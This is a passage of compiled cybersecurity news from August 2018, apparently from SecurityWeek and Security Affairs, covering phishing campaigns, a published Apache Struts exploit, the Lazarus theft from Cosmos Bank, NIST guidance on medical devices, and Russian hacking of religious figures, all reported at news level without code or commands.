
"The Microsoft zero-day is a serious issue, as it impacts fully patched ubiquitous software -- Windows 10 -- which means almost all organizations are vulnerable to it," Glen Pendley, deputy CTO at Tenable, told SecurityWeek. "The question is not whether a patch will be released, but when. What you do between now and then is largely what will determine your level of exposure and risk. Organizations that take a defense in depth approach and those that are closely attuned to their system configurations and user behavior are the best positioned to reduce their overall risk."

Contacted by SecurityWeek to get more information on its patching plans for this bug, a Microsoft spokesperson said,"Windows has a customer commitment to investigate reported security issues, and proactively update impacted devices as soon as possible. Our standard policy is to provide solutions via our current Update Tuesday schedule."

*Updated with comments from Microsoft, Tenable

Email Impersonation Attacks Increase by 80%
29.8.2018 securityweek

The latest ESRA report from Mimecast indicates just why email attacks are so loved by cybercriminals, and why organizations need to take email security more seriously.

ESRA is Mimecast's ongoing Email Security Risk Assessment quarterly analysis. Working with 37 organizations across 20 different industries, Mimecast compares the email threats it detects to those detected by the organizations' incumbent email security technologies. The results provide two major sets of statistics: the volume of threats that go undetected by the incumbent technologies; and the sheer size of the email threat.

The latest report (PDF) covers more than 142 million emails received by almost 261,924 users. The incumbent email security was Office 365 and Proofpoint.

ESRA's analysis shows that a total of more than 19 million spam emails; 13,176 emails containing dangerous file types; and 15,656 malware attachments were missed by the incumbent security and delivered to users' inboxes. It also discovered 203,000 malicious links within just over 10 million emails that were delivered to inboxes -- a ratio of around one unstopped malicious link in every fifty inspected emails.

This doesn't mean that the bad emails were effective, only that they were delivered to their destination. Other security controls might detect malware and inhibit users from clicking on malicious links -- but it does imply that these additional controls need to be 100% effective against threats that could have been blocked before delivery.

One figure that stands out in the analysis is an increase of 80% in impersonation attacks over the last quarter's analysis. Mimecast detected 41,605 cases that had been missed by the organizations' existing controls.

“Targeted malware, heavily socially-engineered impersonation attacks, and phishing threats are still reaching employee inboxes. This leaves organizations at risk of a data breach and financial loss,” said Matthew Gardiner, cybersecurity strategist at Mimecast. “Our latest quarterly analysis saw a continued attacker focus on impersonation attacks quarter-on-quarter. These are difficult attacks to identify without specialized security capabilities, and this testing shows that commonly used systems aren’t doing a good job catching them.”

Mimecast was founded in 2003 by Neil Murray (CTO) and Peter Bauer (CEO). It went public in 2015, and its share price has risen steadily from an initial $10 to its current value at just over $41. During 2018 it has acquired both Solebit (a threat detection firm) and Ataata (a security training firm)

Iran-linked COBALT DICKENS group targets universities in new phishing campaign
29.8.2018 securityaffairs APT

Experts from SecureWorks discovered a large phishing campaign targeting universities carried out by an Iran-linked threat actor COBALT DICKENS.
Security firm SecureWorks has uncovered a new phishing campaign carried out by COBALT DICKENS APT targeting universities worldwide, it involved sixteen domains hosting more than 300 spoofed websites for 76 universities in 14 countries, including Australia, Canada, China, Israel, Japan, Switzerland, Turkey, the United Kingdom, and the United States.

“SecureWorks Counter Threat Unit™ (CTU) researchers discovered a URL spoofing a login page for a university. Further research into the IP address hosting the spoofed page revealed a broader campaign to steal credentials.” reads the report published by SecureWorks.

“Sixteen domains contained over 300 spoofed websites and login pages for 76 universities located in 14 countries, including Australia, Canada, China, Israel, Japan, Switzerland, Turkey, the United Kingdom, and the United States”

Iran hackers cobalt dickens attack

Universities are a privileged target for nation-state actors aimed at stealing intellectual property and cutting-edge projects.

Most of the websites spoofed universities’ online library systems, the attackers were interested in accessing those resources and gather intelligence.

The visitors were displayed login pages, once they have entered their credentials they were redirected to the legitimate websites where they were automatically logged into a valid session or were asked to enter their credentials again.

Many of the domains used by COBALT DICKENS were registered between May and August 2018, most of them resolved to the same IP address and DNS name server.

The attackers shared the same infrastructure used by the COBALT DICKENS group in a previous campaign.

Iranian hacking activity is intensifying in the last years, security firms uncovered the activities of many Iran-linked APT groups.

The US Department of Justice and Department of the Treasury in March announced charges against nine Iranians for alleged involvement in a massive state-sponsored hacking scheme, the hackers hit more than 300 universities and tens of companies in the US and abroad and stole “valuable intellectual property and data.”

According to the Treasury Department, since 2013, the Mabna Institute hit 144 US universities and 176 universities in 21 foreign countries.

Geoffrey Berman, US Attorney for the Southern District of New York revealed that the spear phishing campaign targeted more than 100,000 university professors worldwide and about 8,000 accounts were compromised.

The Iranian hackers exfiltrated 31 terabytes, roughly 15 billion pages of academic projects were stolen.

The hackers also targeted the US Department of Labor, the US Federal Energy Regulatory Commission, and many private and non-governmental organizations.

The sanctions also hit the Mabna Institute, an Iran-based company, that had a critical role in coordinating the attacks on behalf of Iran’s Revolutionary Guards.

“In March 2018, the U.S. Department of Justice indicted the Mabna Institute and nine Iranian nationals in connection with COBALT DICKENS activity occurring between 2013 and 2017.” concludes the report.

“Many threat groups do not change their tactics despite public disclosures, and CTU analysis suggests that COBALT DICKENS may be responsible for the university targeting despite the indictments of some members.”

Facebook Pulls Security App From Apple Store Over Privacy

28.8.2018 securityweek Social

Facebook has pulled one of its own products from Apple's app store because it didn't want to stop tracking what people were doing on their iPhones. Facebook also banned a quiz app from its social network for possible privacy intrusions on about 4 million users.

The twin developments come as Facebook is under intense scrutiny over privacy following the Cambridge Analytica scandal earlier this year. Allegations that the political consultancy used personal information harvested from 87 million Facebook accounts have dented Facebook's reputation.

Since the scandal broke, Facebook has investigated thousands of apps and suspended more than 400 of them over data-sharing concerns.

The social media company said late Wednesday that it took action against the myPersonality quiz app, saying that its creators refused an inspection. But even as Facebook did that, it found its own Onavo Protect security app at odds with Apple's tighter rules for applications.

Onavo Protect is a virtual-private network service aimed at helping users secure their personal information over public Wi-Fi networks. The app also alerts users when other apps use too much data.

Since acquiring Onavo in 2013, Facebook has used it to track what apps people were using on phones. This surveillance helped Facebook detect trendy services, tipping off the company to startups it might want to buy and areas it might want to work on for upcoming features.

Facebook said in a statement that it has "always been clear when people download Onavo about the information that is collected and how it is used."

But Onavo fell out of compliance with Apple's app-store guidelines after they were tightened two months ago to protect the reservoir of personal information that people keep on their iPhones and iPads.

Apple's revised guidelines require apps to get users' express consent before recording and logging their activity on a device. According to Apple, the new rules also "made it explicitly clear that apps should not collect information about which other apps are installed on a user's device for the purposes of analytics or advertising/marketing."

Facebook will still be able to deploy Onavo on devices powered by Google's Android software.

Onavo's ouster from Apple's app store widens the rift between two of the world's most popular companies.

Apple CEO Tim Cook has been outspoken in his belief that Facebook does a shoddy job of protecting its 2.2 billion users' privacy — something that he has framed as "a fundamental human right."

Cook sharpened his criticism following the Cambridge Analytica scandal. He emphasized that Apple would never be caught in the same situation as Facebook because it doesn't collect information about its customers to sell advertising. Facebook CEO Mark Zuckerberg fired back in a separate interview and called Cook's remarks "extremely glib." Zuckerberg implied that Apple caters primarily to rich people with a line of products that includes the $1,000 iPhone X.

Late Wednesday, Facebook said it moved to ban the myPersonality app after it found user information was shared with researchers and companies "with only limited protections in place." The company said it would notify the app's users that their data may have been misused.

It said myPersonality was "mainly active" prior to 2012. Though Facebook has tightened its rules since then, it is only now reviewing those older apps following the Cambridge Analytica scandal.

The app was created in 2007 by researcher David Stillwell and allowed users to take a personality questionnaire and get feedback on the results.

"There was no misuse of personal data," Stillwell said in a statement, adding that "this ban appears to be purely cosmetic." Stillwell said users gave their consent and the app's data was fully anonymized before it was used for academic research. He also rejected Facebook's assertion that he refused to submit to an audit.

FireEye: Tech Firms' Secret Weapon Against Disinformation
28.8.2018 securityweek IT

NEW YORK (AP) — This week has seen major social media sites step up their policing of online disinformation campaigns.

Google disabled dozens of YouTube channels and other accounts linked to a state-run Iranian broadcaster running a political-influence campaign.

Facebook removed 652 suspicious pages, groups and accounts linked to Russia and Iran.

Twitter took similar action shortly thereafter.

What did they have in common? The security firm FireEye.

Best known for its work on high-profile cyberattacks against companies including Target, JPMorgan Chase and Sony Pictures, FireEye is emerging as a key player in the fight against election interference and disinformation campaigns.

Founded in 2004, FireEye is based in Silicon Valley and staffed with a roster of former military and law-enforcement cyberexperts.

"They've really become the Navy SEALs of cybersecurity, especially for next-generation cybersecurity threats," said GBH Insights analyst Dan Ives.

Lee Foster, manager of information operations analysis at FireEye, said his team works within the company's intelligence outfit, which researches not only "info-ops" — like the Iran-linked social media activity it recently uncovered — but espionage, financial crime and other forms of vulnerability and exploitation. Specialist teams at FireEye focus on particular areas of cyberthreats, each with their own expertise and language capabilities.

"We kind of operate like a private-sector intelligence operation," he said.

FireEye was founded by Ashar Aziz, who developed a system for spotting threats that haven't been tracked before, unlike older companies that sold firewalls or anti-virus programs that block known malware.

Aziz, a former Sun Microsystems engineer, created a system that uses software to simulate a computer network and check programs for suspicious behavior, before allowing them into the network itself.

FireEye raised its profile in 2014 by acquiring Mandiant, known for expertise in assessing damage and tracing the source of cyberattacks. Mandiant founder Kevin Mandia, a former U.S. Air Force investigator, is now FireEye's CEO.

While businesses are spending more on information security, FireEye itself has spent heavily on research, development, sales and marketing. That has led to struggles to remain profitable, as heavy investments offset revenue growth.

Mandia said that during the three months ended June 30, FireEye's email security found 6 million spear-phishing attacks, a type of hacking, and its security products alerted companies of attempts to breach security 29 million times. That's important, Mandia said, because most of FireEye's products are deployed behind their client's existing firewalls or antivirus software, so everything FireEye catches has already evaded other defenses, he said.

"We are the investigators called in when the processes, people, and technology fail to prevent a security breach or incident," he said. "We find the gaps in the security fabric and we find the needle in the haystack."

FireEye Inc.'s second-quarter revenue rose 6 percent to $203 million but it lost $72.9 million, or 38 cents per share. That met Wall Street's expectations, but its shares fell as investors expected more.

That's a common problem in the white-hot cybersecurity sector, which includes competitors like Palo Alto Networks, CloudFlare and Check Point. The companies are facing high expectations as the cybersecurity market booms, fueled by heightened cyberattacks and hacking fears.

"As the space has become more competitive ... profitability and growth has been a challenge for (FireEye)," Ives said.

Still, FireEye's stock jumped 6 percent on Thursday when news broke of its role in uncovering the fake accounts on YouTube, Facebook and Twitter. It was up another 3 percent Friday.

FireEye shares hit their all-time peak of $95.63 on March 5, 2014, a few months after they went public, but began a long decline after that, hitting an all-time low of $10.40 almost exactly three years later on March 14, 2017. In the past month the stock has traded between $14.38 and $16.69.

And the company's reputation continues to grow.

"There are many vendors that play in cybersecurity when you look at some of the very sophisticated threats facing enterprise and governments," Ives said. "FireEye many times gets that first phone call when it comes to assess threat environment for companies."

Exploit for Recent Critical Apache Struts Vulnerability Published
28.8.2018 securityweek
Exploit  Vulnerebility

Exploit code for a Critical remote code execution vulnerability in Apache Struts 2 was published on GitHub within days after the bug was addressed last week.

Tracked as CVE-2018-11776, the security flaw was found to impact Struts 2.3 through 2.3.34, Struts 2.5 through 2.5.16, and possibly unsupported versions of the popular Java framework.

In their advisory, code analysis company Semmle, which discovered the flaw and reported it to the Apache Software Foundation in April, explains that the bug affects commonly-used endpoints of Struts, which are likely to be exposed.

To make matters worse, the issue is related to the Struts OGNL (Object-Graph Navigation Language) language, which hackers are often familiar with.

To exploit the bug, attackers need to inject their own namespace as a parameter in an HTTP request. The value of that parameter, the code analysis company reveals, is insufficiently validated by the Struts framework, and can be any OGNL string.

Although only limited details on the vulnerability were made public, a working proof-of-concept (PoC) was published less than two days after the Apache Software Foundation released their advisory.

On Friday, threat intelligence provider Recorded Future revealed that, in addition to the PoC and a Python script that allows for easy exploitation of the vulnerability, they also detected “chatter in a number of Chinese and Russian underground forums around the exploitation of this vulnerability.”

CVE-2018-11776, Recorded Future says, is even easier to exploit compared to last year’s CVE-2017-5638, the Apache Struts exploit that was at the heart of the Equifax breach. There are hundreds of millions of potentially vulnerable systems, but identification could be challenging, as many are backend application servers.

“The new Apache Struts vulnerability is potentially even more damaging than the one from 2017 that was used to exploit Equifax. Unlike that vulnerability, this one does not require any plug-ins to be present in order to exploit it, a simple well-crafted URL is enough to give an attacker access to a victim's Apache Struts installation and there is already exploit code on Github and underground forums are talking about how to exploit it,” Allan Liska, Senior Security Architect, Recorded Future, said in an emailed comment to SecurityWeek.

Semmle, on the other hand, won’t confirm whether the PoC is working. However, the company does warn that the published code could provide attackers with a quick way into enterprise networks.

“There is always a time lag between the announcement of a patch and a company updating its software. There are many reasons why companies can’t update software like Struts immediately, as it is used for many business-critical operations. We aim to give companies a chance to stay safe by working with Apache Struts to make a coordinated disclosure,” Semmle CEO, Oege de Moor, told SecurityWeek via email.

“The Equifax breach happened not because the vulnerability wasn’t fixed, but because Equifax hadn’t yet updated Struts to the latest version. If this is a true working PoC, then any company who hasn’t had the time to update their software, will now be at even greater risk,” de Moor said.

Google Tells Toomey Hackers Tried to Infiltrate Staff Email
28.8.2018 securityweek Hacking  BigBrothers

Google has alerted U.S. Sen. Pat Toomey's office that hackers with ties to a "nation-state" sent phishing emails to old campaign email accounts, a spokesman for the Pennsylvania Republican said Friday.

Toomey's office was notified this week about the attempt to infiltrate email accounts, said spokesman Steve Kelly. He said the dormant accounts hadn't been used since the end of the 2016 campaign, and the staffers they're attached to no longer work for Toomey. The nation-state wasn't identified.

"This underscores the cybersecurity threats our government, campaigns, and elections are currently facing," he said. "It is essential that Congress impose tough penalties on any entity that undermines our institutions."

Toomey currently isn't running for office and the effort would not have affected the upcoming midterm elections.

Google told Toomey's office that the emails appeared to be exploratory, Kelly said. Based on scans for spam, phishing and malware, the emails likely did not contain malware or links to a credential-phishing site, he said.

A Google spokesman said the company wasn't commenting on the phishing attempt.

The notification is the latest by a tech company of suspected Kremlin attempts to spy on U.S. elected officials and campaigns and potentially meddle in U.S. politics.

Google's warning to Toomey comes just weeks after a Microsoft discovery led Sen. Claire McCaskill, a Missouri Democrat who is running for re-election, to reveal that state-backed Russian hackers tried unsuccessfully to infiltrate her Senate computer network last fall.

That effort recalled what U.S. prosecutors called in a July 13 indictment a concerted effort by Russian military operatives ahead of the 2016 election focused on helping to elect Republican Donald Trump to the presidency by exposing internal divisions in the Democratic Party meant to discredit his opponent, Hillary Clinton. The indictment says the Russian agents broke into Democratic national organization servers and stole and leaked damaging emails.

On Tuesday, Microsoft disclosed what it called new Russian espionage efforts targeting U.S. political groups — this time conservative Republican foes that have promoted sanctions to punish the Kremlin for military aggression against Ukraine.

The company said a group tied to the Russian government created fake websites — presumably to steal passwords or plant spyware— that appeared to spoof two American conservative organizations: the Hudson Institute and the International Republican Institute. Three other fake sites were designed to look as if they belonged to the U.S. Senate.

The Kremlin denied involvement.

"Evil Internet Minute" Report Shows Scale of Malicious Online Activity
28.8.2018 securityweek

Every day, cyber threat intelligence firm RiskIQ hoovers up terabytes of internet data. It concentrates on the internet infrastructure and how it functions, gathering up domains, IP addresses, email addresses and web page materials. It does this on behalf of its customers. With booming cloud and social media, not only is there no longer a perimeter to defend, companies often don't even know what they have to defend.

The attack surface is expanding, and attackers target company brands, suppliers and customers across the internet as well as companies' own data centers. RiskIQ scans the internet to see what, where and how its customers might be vulnerable.

"We collect crawled web pages, mobile apps, social media profiles and more so that we can identify what our clients own online, so they in turn can identify any vulnerabilities or risks -- down to, for example, criminal or malicious actors who may be attempting to masquerade as their business in an effort to go after their employees, or customers, and so on," explained Brandon Dixon, RiskIQ VP of product.

"We use web crawlers," he told SecurityWeek, "which we call 'virtual users' because they have been instrumented to be able to scroll through a page as if they were a normal internet-browsing user." This instrumentation became necessary soon in the company's existence because malevolent actors began to recognize RiskIQ, and began to design their own resources to block or divert the crawlers.

"We run about 2 billion virtual user requests every day," continued Dixon. "The virtual users follow a natural path across the internet -- so, for example, they might conduct a Google search on a keyword of importance to a customer of ours. When it finds a link of relevance, the virtual user clicks on the link, visits and interrogates the page, and visits the links contained on that page. For each page we visit, we grab and save the content, grab all the remote sources from which the page is constructed, and all of the cookies and session information."

So far, RiskIQ has gathered approximately 6 petabytes of data. That's 6,000,000 gigabytes. Some of the gathered data is held for 60 days before being aged out -- but the metadata is stored forever.

The company also scans the internet and gathers mobile apps. "One of our other methods of collecting data," said Dixon, "is to do weekly -- effectively continuous -- internet scans. We run an entire sweep of the IPv4 space, looking for IP addresses that are online, and services they may be running. We'll scan up to 111 ports, in some cases allowing customers to specify a specific port." As a result, RiskIQ is able to identify servers online, the services they're running, and whether they are on or off.

"We're also downloading as many mobile app stores as possible," he added; "including the Android store and whatever we can get our hands on from Apple -- and a number of third-party global app stores and underground mobile app stores. Where possible we decompile the apps to see what permissions they use and if they call out to any blacklisted URLs."

The analysis of this data allows RiskIQ to provide its customers with an overview of threats to their wider internet estate. The analysis is performed in the company's own pipeline. "Any time we collect data," explained Dixon, "it enters that pipeline and we apply pretty complex proprietary policies that allow us to admit an event whenever something satisfies the policy. This could be something that our customers define as interesting, or something our research team has defined as interesting -- or it could just be a generic feed including, for example, a known bad/malicious event or item."

This is a huge mass of analyzed internet data. Each year, RiskIQ compiles some of that data to generate an 'evil internet minute' report (PDF). "It brings that missing sense of scale to all the malicious things that happen on the internet," he told SecurityWeek. "People don't generally have this amount of data available to them. We're in a unique position. Not only do we observe these things, we can provide a pretty heavy statistic around what is happening online for the majority of people that we serve, and we collect from."

That sense of scale is sobering. This year's Evil Internet Minute depicts a range of bad things that happen on the internet every minute of every day. This year's report, published this month, shows 0.17 blacklisted mobile apps are produced every minute (that is, one in every 6 minutes of every day). 0.21 of a new phishing domain is spun up every minute (that is, one every five minutes). 9.2 malvertising incidents occur every minute. 0.05 new hosts running crypto mining malware appear every minute (that is, one new one every 20 minutes). And four potentially vulnerable web components are discovered.

"When brands understand what they look like from the outside-in," notes an associated blog post, "they can begin developing a digital threat management strategy that allows them to discover everything associated with their organization on the internet, both legitimate and malicious, and monitor it for potentially devastating cyber-attacks."

Last month, researchers at RiskIQ connected some the dots in this huge database and discovered that the small Ticketmaster breach reported in June 2018 was actually just a small part of a major campaign, known as Magecart, designed to steal users' payment details. Incidentally, the Evil Internet Minute notes that there are 0.07 new Magecart incidents (about one in every 14 minutes) somewhere on the internet.

San Francisco, Calif.-based RiskIQ raised $30.5 million in a Series C funding round led by Georgian Partners in November 2016. It brought the total raised by the firm to $65.5 million.

NIST's New Advice on Medical IoT Devices
28.8.2018 securityweek Safety

Medical infusion pumps, which deliver medications to patients, are archetypal examples of the expanding threat surface being delivered by connected devices. Connecting these pumps to clinical systems can improve healthcare delivery, but if not properly secured could endanger the patient and expose the health delivery organization (HDO) infrastructure to intrusion.

Over the last few years, researchers have shown that many infusion pumps contain vulnerabilities. In May 2015, researchers found several flaws in Hospira LifeCare pumps that could lead to remote control. In October 2016, Rapid7 found four flaws in the Animas OneTouch Ping insulin pump, one of which could alter the dose and cause a hypoglycemic reaction in the patient. In September 2017, eight remotely exploitable vulnerabilities in the Smiths Medical Medfusion 4000 wireless syringe infusion pumps were patched.

NIST has now responded to these concerns by publishing SP 1800-8: Securing Wireless Infusion Pumps in Healthcare Delivery Organizations (PDF). NIST's primary cybersecurity function is to develop standards and advice for federal agencies. Its 1800 Series, however, is a series of documents designed to present practical, usable, cybersecurity solutions to the cybersecurity community at large. Such documents do not describe regulations or mandatory practices, nor do they carry statutory authority.

SP 1800-8 applies "security controls to the pump's ecosystem to create a 'defense-in-depth' solution for protecting infusion pumps and their surrounding systems against various risk factors. Ultimately," it says, "we show how biomedical, networking, and cybersecurity engineers and IT professionals can securely configure and deploy wireless infusion pumps to reduce cybersecurity risk." It does this using standards-based, commercially available cybersecurity technologies that protect the entire HDO infrastructure.

The document offers "guidelines to better secure the wireless infusion pump ecosystem, such as the hardening of operating systems, segmenting the network, file and program whitelisting, code-signing, and using certificates for both authorization and encryption, maintaining the performance and usability of wireless infusion pumps."

Network segmentation is one of the key themes. It uses network devices such as switches and firewalls to divide a large complex network into a series of smaller subnetworks that can each be better defended. It implies only limited trust even within the organization's perimeter, with internal firewalls limiting access from one subnetwork to another to only trusted users or processes. Segmentation is an important method of preventing or limiting adversarial traversal within a corporate network. It will help prevent an attacker who has breached the wider attack surface of the network gaining access to the smaller attack surface of the medical device.

"For simplicity and convenience," says the document, "we implemented subnets that correspond exactly to VLANs. The routing configuration is the same for each subnet, but the firewall configuration may vary depending on each zone's specific purpose. An external router/firewall device is used to connect the enterprise and guest network to the internet." The segmentation was implemented via a VLAN by using Cisco switches.

It ensures that only known users/processes from a particular subnetwork can even attempt to access the device -- which is further protected by direct access controls.

The basic concept of securing the entire HDO infrastructure in order to better protect wireless connected devices can be applied to more than just infusion pumps, and the document has been well received by the security industry. "Defense in depth is required and is common practice," comments Joseph Kucic, chief security officer at Cavirin. "Beyond the publication, I expect that the appropriate safeguards will include a barrier gateway that records access to update electronic medical records as to who accessed the isolated Controlled Wi-Fi and all actions are done from a controlled device to ensure an audit trail with an extra authentication layer that can be controlled independent of the user's or vendor's normal access privileges. Based on this publication with the mentioned additional controls this can function as a template for other such devices."

Rishi Bhargava, co-founder at Demisto, said, "The NIST SP 1800-8 is a good first step that guides healthcare organizations towards better, more proactive protection of their IoMT (internet of medical things) environments. Since internet connected devices span across multiple industries -- both conventional and upcoming," he told SecurityWeek, "these guidelines have taken the cogent step of mapping best practices with a range of other standards like HIPAA and NIST RMF."

This doesn't mean that everybody is entirely happy with NIST 1800-8. "I'm glad to see there is a guide by NIST addressing the security of wireless infusion pumps," says Chris Morales, head of security analytics at Vectra. "The risks are real as disruption in medical devices can lead to dire consequences. Hospitals quite literally are saving lives and uptime of medical devices is a life or death situation," he told SecurityWeek.

But he is surprised that this document does not appear to be in sync with NIST's larger project on IoT security. "While wireless infusion pumps are of particular interest due to their specific application in healthcare, the risks to the devices are the exact same as any IoT device; and the recommendations should be the same," he said.

Morales is concerned about one specific statement in the NIST document: "Our reference architecture uses Cisco's solution architecture as the baseline. This baseline demonstrates how the network can be used to provide multi-tiered protection for medical devices when exchanging information via a network connection... This section provides additional details on how to employ security strategies to achieve specific targeted protections when securing wireless infusion pumps."

There's nothing new here -- it's standard segmentation practice. But in assigning it to Cisco, he feels that, effectively, "Cisco helped write this document."

"The problem here," he told SecurityWeek, "is that segmentation has never worked in hospitals. Doctors and nurses require constant access to devices and these are not locked down networks, nor can they be. If a doctor cannot access patient health records or devices, it is again a life or death situation. It is a noble attempt, but it thus far has not proven viable in health care, nor perhaps any industry with a large IoT deployment that is critical to the business function."

He thinks that network segmentation is still important, but that it won't look the same as the traditional designs. "The three most important aspects of any IoT security strategy," he suggests, "will be device identification, network segmentation, and network traffic analytics. IoT becomes a big data problem with lots of devices producing huge amounts of data and a large amount of remote access. These deployments will need to be monitored in real time to identify the difference between approved and unapproved behaviors."

North Korea-linked Hackers Stole $13.5 Million From Cosmos Bank: Report
28.8.2018 securityweek APT  BigBrothers

The North Korea-linked hacking group Lazarus is said to have stolen $13.5 million in a recent cyber-attack targeting SWIFT/ATM infrastructure of Cosmos Bank.

The attackers likely gained access to the bank’s systems via spear phishing and/or remote administration/third-party interface and used multiple attack techniques to steal funds. The theft took place between August 10 and 13, 2018, according to researchers from Securonix.

Believed to be backed by the North Korean government, the Lazarus group was said last year to be the most serious threat to banks. This year, the hackers also focused heavily on crypto-currency exchanges and have been involved in numerous attacks against such organizations.

A recent report also revealed that most malware families originating from North Korea can be linked to Lazarus via code reuse.

Now, Securonix security researchers reveal that Lazarus was behind a high-profile ATM/SWIFT banking attack involving the Cosmos Bank, a 112-year old cooperative bank in India and the second largest in the country.

As part of the incident, the hackers are believed to have leveraged a previously established foothold before compromising the bank’s internal and ATM infrastructure on August 10-11.

Likely abusing vendor ATM test software or modifying the currently deployed ATM payment switch software, they set up a malicious ATM/POS switch and hijacked the connection between the central switch and the backend/Core Banking System (CBS).

Next, they made adjustments to the target account balances to enable withdrawals and leveraged the malicious switch to authorize ATM withdrawals for over $11.5 million in tens of thousands of domestic and international transactions, using 450 cloned (non-EMV) debit cards in 28 countries.

The malicious switch was used to send fake messages to authorize the transactions and also to prevent details sent from payment switch to reach the CBS (thus, checks on card number, card status PIN, and more were never performed).

On August 13, 2018, likely following lateral movement, the threat actor abused the Cosmos Bank’s SWIFT SAA environment LSO/RSO compromise/authentication to send three international wire transfer requests to ALM Trading Limited at Hang Seng Bank in Hong Kong, amounting to around $2 million.

“The ATM/POS banking switch that was compromised in the Cosmos Bank attack is a component that typically provides hosted ATM/POS terminal support, an interface to core banking solution (CBS) or another core financial system, and connectivity to regional, national or international networks. The primary purpose of the system is to perform transaction processing and routing decisions,” Securonix explains.

By focusing on the bank’s infrastructure instead of basic card-not-present (CNP), jackpotting or blackboxing fraud, the well-planned, highly coordinated attack was able to effectively bypass bank’s layers of defense against ATM attacks.

The security firm attributes the attack to Lazarus, a group known for the use of Windows Admin Shares for Lateral Movement, the use of custom command and control (C&C) servers that mimic TLS, the use of Windows services for persistence, timestomping, and reflective DLL injection, along with other attack techniques.

Sacrilegious Spies: Russians Tried Hacking Orthodox Clergy
28.8.2018 securityweek BigBrothers

Russian Hackers Who Bedeviled 2016 U.S. Election Also Spied on Senior Orthodox Christian Figures

LONDON (AP) — The Russian hackers indicted by the U.S. special prosecutor last month have spent years trying to steal the private correspondence of some of the world's most senior Orthodox Christian figures, The Associated Press has found, illustrating the high stakes as Kiev and Moscow wrestle over the religious future of Ukraine.

The targets included top aides to Ecumenical Patriarch Bartholomew I, who often is described as the first among equals of the world's Eastern Orthodox Christian leaders.

The Istanbul-based patriarch is currently mulling whether to accept a Ukrainian bid to tear that country's church from its association with Russia, a potential split fueled by the armed conflict between Ukrainian military forces and Russia-backed separatists in eastern Ukraine.

The AP's evidence comes from a hit list of 4,700 email addresses supplied last year by Secureworks, a subsidiary of Dell Technologies.

The AP has been mining the data for months, uncovering how a group of Russian hackers widely known as Fancy Bear tried to break into the emails of U.S. Democrats , defense contractors , intelligence workers , international journalists and even American military wives . In July, as part of special counsel Robert Mueller's ongoing investigation into Russian interference in the 2016 U.S. election, a U.S. grand jury identified 12 Russian intelligence agents as being behind the group's hack-and-leak assault against Hillary Clinton's presidential campaign.

The targeting of high-profile religious figures demonstrates the wide net cast by the cyberspies.

Patriarch Bartholomew claims the exclusive right to grant a "Tomos of Autocephaly," or full ecclesiastic independence, sought by the Ukrainians. It would be a momentous step, splitting the world's largest Eastern Orthodox denomination and severely eroding the power and prestige of the Moscow Patriarchate, which has positioned itself as a leading player within the global Orthodox community.

Ukraine is lobbying hard for a religious divorce from Russia and some observers say the issue could be decided as soon as next month.

"If something like this will take place on their doorstep, it would be a huge blow to the claims of Moscow's transnational role," said Vasilios Makrides, a specialist in Orthodox Christianity at the University of Erfurt in Germany. "It's something I don't think they will accept."

The Kremlin is scrambling to help Moscow's Patriarch Kirill retain his traditional role as the head of the Ukrainian Orthodox Church and "the more they know, the better it is for them," Makrides said.

The Russian Orthodox Church said it had no information about the hacking and declined comment. Russian officials referred the AP to previous denials by the Kremlin that it has anything to do with Fancy Bear, despite a growing body of evidence to the contrary.

Ukrainian President Petro Poroshenko flew to Istanbul in April in an effort to convince the patriarch to agree to a split, which he has described as "a matter of our independence and our national security." Moscow's Patriarch Kirill is flying to Turkey later this week in a last-ditch bid to prevent it.

Hilarion Alfeyev, Kirill's representative abroad, has warned that granting the Tomos could lead to the biggest Christian schism since 1054, when Catholic and Orthodox believers parted ways.

"If such a thing happens, Orthodox unity will be buried," Alfeyev said.

The issue is an extraordinarily sensitive one for the Ecumenical Patriarchate. Reached by phone, spokesman Nikos-Giorgos Papachristou said: "I don't want to be a part of this story."

Other church officials spoke to the AP about the hacking on condition of anonymity, saying they did not have authorization to speak to the media.

Bartholomew, who is 78, does not use email, those church officials told AP. But his aides do, and the Secureworks list spells out several attempts to crack their Gmail accounts.

Among them were several senior church officials called metropolitans, who are roughly equivalent to archbishops in the Catholic tradition. Those include Bartholomew Samaras, a key confidante of the patriarch; Emmanuel Adamakis, an influential hierarch in the church; and Elpidophoros Lambriniadis, who heads a prestigious seminary on the Turkish island of Halki. All are involved in the Tomos issue; none returned recent AP messages seeking comment.

Spy games have long been a part of the Russian Orthodox world.

The Soviet Union slaughtered tens of thousands of priests in the 1930s, but the Communists later took what survived of the church and brought it under the sway of Russia's secret police, the KGB, with clerics conscripted to spy on congregants and emigres.

The nexus between Russia's intelligence and religious establishments survived the 1991 fall of the Soviet Union and the KGB's reorganization into the FSB, according to Moscow-based political analyst Dmitry Oreshkin.

"Our church leaders are connected to the FSB and their epaulettes stick out from under their habits," Oreshkin said. "They provide Vladimir Putin's policy with an ideological foundation."

That might make one target found by the AP seem curious: The Moscow Patriarch's press secretary, Alexander Volkov.

But Orthodox theologian Cyril Hovorun said he wouldn't be surprised to see a Russian group spying on targets close to home, saying, "they're probably checking him out just in case."

Volkov did not return AP emails seeking comment.

Hovorun is unusually qualified to speak on the issue. In 2012 he — like Volkov — was an official within the Moscow Patriarchate. But he resigned after someone leaked emails showing that he secretly supported independence-leaning Ukrainian clergy.

Hovorun has since been targeted by the Russian hackers, according to the data from Secureworks, which uses the name Iron Twilight to refer to the group.

Hovorun said he believes that those who published his emails six years ago weren't related to Fancy Bear, but he noted that their modus operandi — stealing messages and then publishing them selectively — was the same.

"We've known about this tactic before the hacking of the Democrats," Hovorun said, referring to the email disclosures that rocked America's 2016 presidential campaign. "This is a familiar story for us."

The Russian hackers' religious dragnet also extended to the United States and went beyond Orthodox Christians, taking in Muslims, Jews and Catholics whose activities might conceivably be of interest to the Russian government.

John Jillions, the chancellor of the Orthodox Church in America, provided the AP with a June 19, 2015, phishing email that Secureworks later confirmed was sent to him by Fancy Bear.

Fancy Bear also went after Ummah, an umbrella group for Ukrainian Muslims; the papal nuncio in Kiev; and an account associated with the Ukrainian Greek-Catholic Church, a Byzantine rite church that accepts the authority of the Vatican, the Secureworks data shows.

Also on the hit list: Yosyp Zisels, who directs Ukraine's Association of Jewish Organizations and Communities and has frequently been quoted defending his country from charges of anti-Semitism. Zisels said he had no knowledge of the attempted hacking. Vatican officials did not return messages.

Protestants were targeted too, including three prominent Quakers operating in the Moscow area.

Hovorun said Protestants were viewed with particularly intense suspicion by the Kremlin.

"There is an opinion shared by many in the Russian establishment that all those religious groups — like Quakers, evangelicals — they are connected to the American establishment," he said.

